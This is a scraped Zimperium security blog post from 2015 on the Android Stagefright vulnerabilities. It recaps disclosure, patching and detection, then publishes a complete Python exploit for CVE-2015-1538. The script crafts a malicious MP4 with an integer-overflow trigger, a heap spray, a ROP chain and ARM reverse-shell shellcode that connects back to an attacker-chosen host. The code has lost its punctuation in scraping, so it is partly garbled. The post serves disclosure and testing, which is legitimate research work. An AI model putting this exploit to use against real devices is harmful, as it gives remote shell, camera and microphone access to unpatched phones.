The Latest on Stagefright: CVE-2015-1538 Exploit is Now Available for Testing Purposes Zimperium Mobile Security Blog
https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/
More from: blog.zimperium.com
show/hide source |
https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/
More than a month after the discovery of multiple critical vulnerabilities in Android’s media library (libstagefright), several exploits are already on the wild, including one from Imperium that results in a reverse shell.
What follows is a python script that generates an MP4 exploiting the ‘stsc’ vulnerability otherwise known as CVE-2015-1538. [...] As detailed in Joshua Drake’s Black Hat and DEFCON presentations, this user has access to quite a few groups such as inet, audio, camera, and mediadrm. These groups allow an attacker to take pictures or listen to the microphone remotely without exploiting additional vulnerabilities.Although this particular exploit does not work on Android 5.0 and later, other exploit developers claim to have successfully managed to bypass ASLR using an information leakage vulnerability in Stagefright. Tags: android vulnerability stagefright
More from: blog.zimperium.com
show/hide source |
The Latest on Stagefright: CVE-2015-1538 Exploit is Now Available for Testing Purposes Zimperium Mobile Security Blog .no-break br { display: none !important; } img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } [if lte IE 8]> <link rel='stylesheet' id='theme-ie-styles-css' href='https://blog.zimperium.com/wp-content/themes/zimperium/assets/css/ie.css?ver=1.0.0b1438045676' type='text/css' media='all' /> <![endif] [if lt IE 9]> <script src="https://blog.zimperium.com/wp-content/themes/rotorwash2/assets/lib/html5shiv/html5shiv.js"></script> <script src="https://blog.zimperium.com/wp-content/themes/rotorwash2/assets/lib/respond/respond.min.js"></script> <![endif] Toggle navigation Threat Landscape Products Overview zIPS Protection zConsole Management zANTI Diagnostic Technology Company Company Support Partners Events Jobs Resources Resources Webinars Whitepapers Blog Request Demo The Latest on Stagefright: CVE-2015-1538 Exploit is Now Available for Testing Purposes By zLabs Wednesday, Sep 9 2015 at 08:05 More than a month has passed since Zimperium first broke the news of zLabs VP of Platform Research and Exploitation Joshua J. Drakes discovery of multiple critical vulnerabilities in Androids media library libstagefright. In that time frame, the number and importance of the events that have unfolded is nothing short of amazing. Back in April and May we reported two sets of vulnerabilities to Google, both including multiple with critical severity. In July, we announced our intentions to publish our exploit on August 5th during Black Hat USA. After discussions with ZHA Partners, including both carriers and device manufacturers, we agreed to postpone the release of the exploit until August 24th. Multiple researchers have publicly discussed their own working exploits targeting vulnerabilities within libstagefright. Before we dive into our exploit, lets recap the key events that unfolded since our recent announcement. Black Hat Slides and Video Available We madeJoshuas presentation slides available shortly after Black Hat and DEF CON. Later, the Black Hat organizers made the full video available on YouTube. Please review these materials to learn more about Joshuasresearch straight from the source. Unassisted Remote Attack Vector Addressed Google released new versions of Hangouts and Messenger to block automatic processing of multimedia files arriving via MMS. Weve tested these updated versions and are happy to confirm they prevent unassisted remote exploitation. However, this attack vector constituted only the worst of more than 10 different ways (browsers, instant messengers, etc) potentially malicious media is processed by the Stagefright library. With these other vectors still present, the importance of fixing issues within the code base remains very high. Additional Vulnerabilities Reported We expected other researchers to explore the vulnerabilities we disclosed and discover additional vulnerabilities in the Stagefright library over time. That said, we did not expect the incredible level of response from the community. We applaud the efforts of myriad researchers that flocked to audit the Android code base and collectively discovered and reported numerous additional issues. Update Changes and Status The most positive thing about our Stagefright research is waking the ecosystem and getting device vendors and carriers to realize they must distribute updates more quickly and more often. Industry leading vendors clearly stated that they intend to provide security updates on a monthly basis. Now that we are facing additional vulnerabilities, well see for ourselves if our devices get these updates or not. In the meantime, updates addressing the initial set of issues we disclosed continue to roll out to affected devices. Additional Update is Required Shortly after the events in Las Vegas, researchers from Exodus Intelligence discovered a problem with one of the patches Joshua supplied. Google quickly analyzed this issue, assigned CVE-2015-3864, and pushed a fix to AOSP. We expect the fix to be included in the next round of official updates. In fact, our Stagefright Detector app data shows that some devices have received an update for this issue already. Regardless, we feel this issue represents a significant risk to the ecosystem and thus should be addressed sooner rather than later. Our Detection Efforts In order to best serve the mobile ecosystem, we created the Stagefright Detector app to detect if your device is vulnerable to the vulnerabilities discovered in libstagefright. After CVE-2015-3864 was publicly disclosed, we added it to the set of vulnerabilities tested in the app. Since then, we have been working directly with Google to port the apps detection logic into Androids Compatibility Test Suite (CTS). This means future versions of Android for all Android Compatible devices must have these issues fixed before they can ship. Zimperiums z9 enterprise customers, have the capability to detect attacks exploiting Stagefright vulnerabilities. Two demo videos are referenced below: one showing a successful attack, and another showing the attack being detected. Researchers are Working on their Exploits On August 25th, we discovered a researchers post on Twitter about his independent implementation of an exploit against libstagefright. His post shows his exploit works against Android 5.0 running in the emulator. This is consistent with information that a student and independent researcher posted on Twitter stating he had managed to bypass ASLR using an information leakage vulnerability in Stagefright. In the event additional public exploits surface, please exercise caution before running them, as they may contain backdoors. Releasing Our Exploit for Testing Purposes During the months of June and July, Joshua J. Drake developed a working exploit to prove the Stagefright vulnerability can allow Remote Code Execution (RCE) without user interaction. We are pleased to finally make this code available to the general public so that security teams, administrators, and penetration testers alike may test whether or not systems remain vulnerable. What follows is a python script that generates an MP4 exploiting the stsc vulnerability otherwise known as CVE-2015-1538 (#1). This is one of the most critical vulnerabilities we reported in the Stagefright library. The expected result of the exploit is a reverse shell as the media user. As detailed in Joshua Drakes Black Hat and DEFCON presentations, this user has access to quite a few groups such as inet, audio, camera, and mediadrm. These groups allow an attacker to take pictures or listen to the microphone remotely without exploiting additional vulnerabilities. This exploit has several caveats. First, it is not a generic exploit. We only tested it to work on a single device model. We tested this exploit on a Nexus running Android 4.0.4. Also, due to variances in heap layout, this is not a 100% reliable exploit by itself. We were able achieve 100% reliability when delivered through an attack vector that allowed multiple attempts. Finally, this vulnerability was one of several that was neutered by GCC 5.0s new[] integer overflow mitigation present on Android 5.0 and later. Stagefright_CVE-2015-1538-1_Exploit.py (raw file) #!/usr/bin/env python # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs # Shout outs to our friends at Optiv (formerly Accuvant Labs) # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 # www.zimperium.com # # Exploit for RCE Vulnerability CVE-2015-1538 #1 # Integer Overflow in the libstagefright MP4 stsc atom handling # # Dont forget, the output of create_mp4 can be delivered many ways! # MMS is the most dangerous attack vector, but not the only one # # DISCLAIMER: This exploit is for testing and educational purposes only. Any # other usage for this code is not allowed. Use at your own risk. # # With great power comes great responsibility. Uncle Ben # import struct import socket # # Creates a single MP4 atom LEN, TAG, DATA # def make_chunk(tag, data): if len(tag) != 4: raise Yo! They call it FourCC for a reason. ret = struct.pack(>L, len(data) + 8) ret += tag ret += data return ret # # Make an stco atom Sample Table Chunk Offets # def make_stco(extra=): ret = struct.pack(>L, 0) # version ret += struct.pack(>L, 0) # mNumChunkOffsets return make_chunk(stco, ret+extra) # # Make an stsz atom Sample Table Size # def make_stsz(extra=): ret = struct.pack(>L, 0) # version ret += struct.pack(>L, 0) # mDefaultSampleSize ret += struct.pack(>L, 0) # mNumSampleSizes return make_chunk(stsz, ret+extra) # # Make an stts atom Sample Table Time-to-Sample # def make_stts(): ret = struct.pack(>L, 0) # version ret += struct.pack(>L, 0) # mTimeToSampleCount return make_chunk(stts, ret) # # This creates a single Sample Table Sample-to-Chunk entry # def make_stsc_entry(start, per, desc): ret = ret += struct.pack(>L, start + 1) ret += struct.pack(>L, per) ret += struct.pack(>L, desc) return ret # # Make an stsc chunk Sample Table Sample-to-Chunk # # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and # cause a heap overflow. # def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): ret = struct.pack(>L, 0) # version/flags # this is the clean version if not do_overflow: ret += struct.pack(>L, num_alloc) # mNumSampleToChunkOffsets ret += Z * (12 * num_alloc) return make_chunk(stsc, ret) # now the explicit version. (trigger the bug) ret += struct.pack(>L, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets # fill in the entries that will overflow the buffer for x in range(0, num_write): ret += make_stsc_entry(sp_addr, sp_addr, sp_addr) ret = make_chunk(stsc, ret) # patch the data_size ret = struct.pack(>L, 8 + 8 + (num_alloc * 12)) + ret[4:] return ret # # Build the ROP chain # # ROP pivot by Georg Wicherski! Thanks! # (gdb) x/10i __dl_restore_core_regs 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5} 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc} b0001144 <__dl_mprotect>: b0001144: e92d0090 push {r4, r7} b0001148: e3a0707d mov r7, #125 ; 0x7d b000114c: ef000000 svc 0x00000000 b0001150: e8bd0090 pop {r4, r7} b0001154: e1b00000 movs r0, r0 b0001158: 512fff1e bxpl lr b000115c: ea0015cc b b0006894 <__dl_raise+0x10> def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): rop = rop += struct.pack(<L, sp_addr + off + 0x10) # new sp rop += struct.pack(<L, 0xb0002a98) # new lr pop {pc} rop += struct.pack(<L, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc} rop += struct.pack(<L, sp_addr & 0xfffff000) # new r0 base address (page aligned) rop += struct.pack(<L, 0x1000) # new r1 length rop += struct.pack(<L, 7) # new r2 protection rop += struct.pack(<L, 0xd000d003) # new r3 scratch rop += struct.pack(<L, 0xd000d004) # new r4 scratch rop += struct.pack(<L, 0xb0001144) # new pc _dl_mprotect native_start = sp_addr + 0x80 rop += struct.pack(<L, native_start) # address of native payload #rop += struct.pack(<L, 0xfeedfed5) # top of stack # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit) buf = # fork buf += \x02\x70\xa0\xe3 buf += \x00\x00\x00\xef # continue if not parent buf += \x00\x00\x50\xe3 buf += \x02\x00\x00\x0a # exit parent buf += \x00\x00\xa0\xe3 buf += \x01\x70\xa0\xe3 buf += \x00\x00\x00\xef # setsid in child buf += \x42\x70\xa0\xe3 buf += \x00\x00\x00\xef # socket/connect/dup2/dup2/dup2 buf += \x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c buf += \x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60 buf += \xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0 buf += \xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1 buf += \x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06 buf += \x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00 buf += \x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0 buf += \xe3\x00\x00\x00\xef # execve(shell, argv, env) buf += \x30\x00\x8f\xe2\x04\x40\x24\xe0 buf += \x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d buf += \x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00 buf += \x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00 buf += \xef\x02\x00 # Add the connect back host/port buf += struct.pack(!H, cb_port) cb_host = socket.inet_aton(cb_host) buf += struct.pack(=4s, cb_host) # shell buf += /system/bin/sh\x00\x00 # argv buf += sh\x00\x00 # env buf += PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00 # Add some identifiable stuff, just in case something goes awry rop_start_off = 0x34 x = rop_start_off + len(rop) while len(rop) < 0x80 rop_start_off: rop += struct.pack(<L, 0xf0f00000+x) x += 4 # Add the native payload rop += buf return rop # # Build an mp4 that exploits CVE-2015-1538 #1 # # We mimic meow.3gp here # def create_mp4(sp_addr, newpc_val, cb_host, cb_port): chunks = [] # Build the MP4 header ftyp = mp42 ftyp += struct.pack(>L, 0) ftyp += mp42 ftyp += isom chunks.append(make_chunk(ftyp, ftyp)) # Note, this causes a few allocations moov_data = moov_data += make_chunk(mvhd, struct.pack(>LL, 0, 0x41414141) + (B * 0x5c) ) # Add a minimal, verified trak to satisfy mLastTrack being set moov_data += make_chunk(trak, make_chunk(stbl, make_stsc(0x28, 0x28) + make_stco() + make_stsz() + make_stts() )) # Spray the heap using a large tx3g chunk (can contain binary data!) 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42> 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it! page = off = 0 # the offset to the next object off += 8 page += struct.pack(<L, sp_addr + 8 + 16 + 8 + 12 28) # _vptr.RefBase (for when we smash mDataSource) page += struct.pack(<L, sp_addr + off) # mRefs off += 16 page += struct.pack(<L, 1) # mStrong page += struct.pack(<L, 0xc0dedbad) # mWeak page += struct.pack(<L, sp_addr + off) # mBase page += struct.pack(<L, 16) # mFlags (dont set OBJECT_LIFETIME_MASK) off += 8 page += struct.pack(<L, sp_addr + off) # the mBase _vptr.RefBase page += struct.pack(<L, 0xf00dbabe) # mBase.mRefs (unused) off += 16 page += struct.pack(<L, 0xc0de0000 + 0x00) # vtable entry 0 page += struct.pack(<L, 0xc0de0000 + 0x04) # vtable entry 4 page += struct.pack(<L, 0xc0de0000 + 0x08) # vtable entry 8 page += struct.pack(<L, newpc_val) # vtable entry 12 rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port) x = len(page) while len(page) < 4096: page += struct.pack(<L, 0xf0f00000+x) x += 4 off = 0x34 page = page[:off] + rop + page[off+len(rop):] spray = page * (((2*1024*1024) / len(page)) 20) moov_data += make_chunk(tx3g, spray) block = A * 0x1c bigger = B * 0x40 udta = make_chunk(udta, make_chunk(meta, struct.pack(>L, 0) + make_chunk(ilst, make_chunk(cpil, make_chunk(data, struct.pack(>LL, 21, 0) + A)) + make_chunk(trkn, make_chunk(data, struct.pack(>LL, 0, 0) + AAAABBBB)) + make_chunk(disk, make_chunk(data, struct.pack(>LL, 0, 0) + AAAABB)) + make_chunk(covr, make_chunk(data, struct.pack(>LL, 0, 0) + block)) * 32 + make_chunk(\xa9alb, make_chunk(data, struct.pack(>LL, 0, 0) + block)) + make_chunk(\xa9ART, make_chunk(data, struct.pack(>LL, 0, 0) + block)) + make_chunk(aART, make_chunk(data, struct.pack(>LL, 0, 0) + block)) + make_chunk(\xa9day, make_chunk(data, struct.pack(>LL, 0, 0) + block)) + make_chunk(\xa9nam, make_chunk(data, struct.pack(>LL, 0, 0) + block)) + make_chunk(\xa9wrt, make_chunk(data, struct.pack(>LL, 0, 0) + block)) + make_chunk(gnre, make_chunk(data, struct.pack(>LL, 1, 0) + block)) + make_chunk(covr, make_chunk(data, struct.pack(>LL, 0, 0) + block)) * 32 + make_chunk(\xa9ART, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)) + make_chunk(\xa9wrt, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)) + make_chunk(\xa9day, make_chunk(data, struct.pack(>LL, 0, 0) + bigger))) ) ) moov_data += udta # Make the nasty trak tkhd1 = .join([ \x00, # version D * 3, # padding E * (5*4), # {c,m}time, id, ??, duration F * 0x10, # ?? struct.pack(>LLLLLL, 0x10000, # a00 0, # a01 0, # dx 0, # a10 0x10000, # a11 0), # dy G * 0x14 ]) trak1 = trak1 += make_chunk(tkhd, tkhd1) mdhd1 = .join([ \x00, # version D * 0x17, # padding ]) mdia1 = mdia1 += make_chunk(mdhd, mdhd1) mdia1 += make_chunk(hdlr, F * 0x3a) dinf1 = dinf1 += make_chunk(dref, H * 0x14) minf1 = minf1 += make_chunk(smhd, G * 0x08) minf1 += make_chunk(dinf, dinf1) # Build the nasty sample table to trigger the vulnerability here. stbl1 = make_stsc(3, (0x1200 / 0xc) 1, sp_addr, True) # TRIGGER # Add the stbl to the minf chunk minf1 += make_chunk(stbl, stbl1) # Add the minf to the mdia chunk mdia1 += make_chunk(minf, minf1) # Add the mdia to the track trak1 += make_chunk(mdia, mdia1) # Add the nasty track to the moov data moov_data += make_chunk(trak, trak1) # Finalize the moov chunk moov = make_chunk(moov, moov_data) chunks.append(moov) # Combine outer chunks together and voila. data = .join(chunks) return data if __name__ == __main__: import sys import mp4 import argparse def write_file(path, content): with open(path, wb) as f: f.write(content) def addr(sval): if sval.startswith(0x): return int(sval, 16) return int(sval) # The address of a fake StrongPointer object (sprayed) sp_addr = 0x41d00010 # takju @ imm76i 2MB (via hangouts) # The address to of our ROP pivot newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs # Allow the user to override parameters parser = argparse.ArgumentParser() parser.add_argument(-c, connectback-host, dest=cbhost, default=31.3.3.7) parser.add_argument(-p, connectback-port, dest=cbport, type=int, default=12345) parser.add_argument(-s, spray-address, dest=spray_addr, type=addr, default=None) parser.add_argument(-r, rop-pivot, dest=rop_pivot, type=addr, default=None) parser.add_argument(-o, output-file, dest=output_file, default=cve-2015-1538-1.mp4) args = parser.parse_args() if len(sys.argv) == 1: parser.print_help() sys.exit(-1) if args.spray_addr == None: args.spray_addr = sp_addr if args.rop_pivot == None: args.rop_pivot = newpc_val # Build the MP4 file data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport) print([*] Saving crafted MP4 to %s % args.output_file) write_file(args.output_file, data) Acknowledgements We would like to thank Google, Samsung, LG, Motorola, Sony, HTC as well as other vendors and partners of ZHA for their cooperation prioritizing vulnerabilities in the Stagefright library in their updates: CVE-2015-1538 CVE-2015-1538 #1 CVE-2015-1538 #2 CVE-2015-1538 #3 CVE-2015-1538 #4 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 CVE-2015-3864 We encourage vendors who still did not provide comprehensive device updates to address Stagefright issues to do so ASAP. References You can find more information on our work regarding vulnerabilities in the Stagefright library below: Posts Stagefright Initial Vulnerability Disclosure, CVE Details and impact http://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/ How to disable auto-fetching of MMS https://blog.zimperium.com/how-to-protect-from-stagefright-vulnerability/ Zimperium Handset Alliance for Carriers and Device Vendors https://blog.zimperium.com/zha-zimperiums-initiative-to-fill-the-gaps-in-android-security/ Vulnerability Details, Patches, POC files: https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/ Updates for Stagefright Issues: https://blog.zimperium.com/zha-to-work-with-carriers-and-vendors-to-roll-out-updates/ Videos Joshuas Presentation at Black Hat USA: https://www.youtube.com/watch?v=71YP65UANP0 Stagefright Exploit Demonstration with Zimperium zIPS detection: https://www.youtube.com/watch?v=7S-11k28324 Stagefright Exploit Demonstration on Android 4.0.4 without user interaction: https://www.youtube.com/watch?v=PxQc5gOHnKs Follow us on Twitter for more updates. Follow Us Follow @zimperium Zimperium solution nominated for Most Disruptive Technology by the Telecom Council Categories Events (5) Mobile Malware (10) Mobile security (41) News (35) Research (12) Resources (2) Uncategorized (2) Zimperium Mobile Security (10) Recent Posts The Latest on Stagefright: CVE-2015-1538 Exploit is Now Available for Testing Purposes Zimperium solution nominated for Most Disruptive Technology by the Telecom Council Stagefright wakes up the mobile eco-system Stagefright: Vulnerability Details, Stagefright Detector tool released ZHA Accelerating roll-out of Security Patches View Webinar Modern Mobile Threats Zimperium Webinar featuring Gartner Mobile device attacks are on the rise, threatening to compromise the proprietary information of businesses on a global level. This presentation will cover how to keep your information safe in a highly hackable world. Request Demo Demo Request Demo Whitepaper Mobile Security - Are You At Risk (Yet)?Find out if your organization has adopted a true mobile security solution. Download Copyright 2010 - 2015 . All rights Reserved. | Terms of Use | Privacy Policy